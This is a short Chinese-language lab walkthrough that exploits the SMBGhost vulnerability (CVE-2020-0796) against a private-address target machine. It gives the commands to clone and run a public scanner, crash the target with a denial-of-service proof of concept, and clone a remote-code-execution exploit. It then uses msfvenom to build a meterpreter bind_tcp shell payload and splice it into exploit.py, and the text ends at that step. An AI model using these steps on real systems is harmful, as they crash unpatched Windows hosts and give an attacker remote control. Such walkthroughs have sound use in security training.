漏洞检测
检测工具:https://github.com/ollypwn/SMBGhost
先下载
git clone https://github.com/ollypwn/SMBGhost
进入工具目录
cd SMBGhost/
用python3调用scanner.py
python3 scanner.py 192.168.28.135
靶机192.168.28.135自身确实存在漏洞。
漏洞攻击
poc:https://github.com/eerykitty/CVE-2020-0796-PoC
先获取工具
git clone https://github.com/eerykitty/CVE-2020-0796-PoC
进入工具目录
cd CVE-2020-0796-PoC/
Pip3下载依赖工具
pip3 install ntlm_auth
靶机蓝屏
0X05 getshell
脚本下载:.
Git clone https://github.com/chompie1337/SMBGhost_RCE_PoC
生成反向连接木马
本地端口可以随意指定 -f 文件类型 -o目标文件名
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -f py -o nb.py
用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)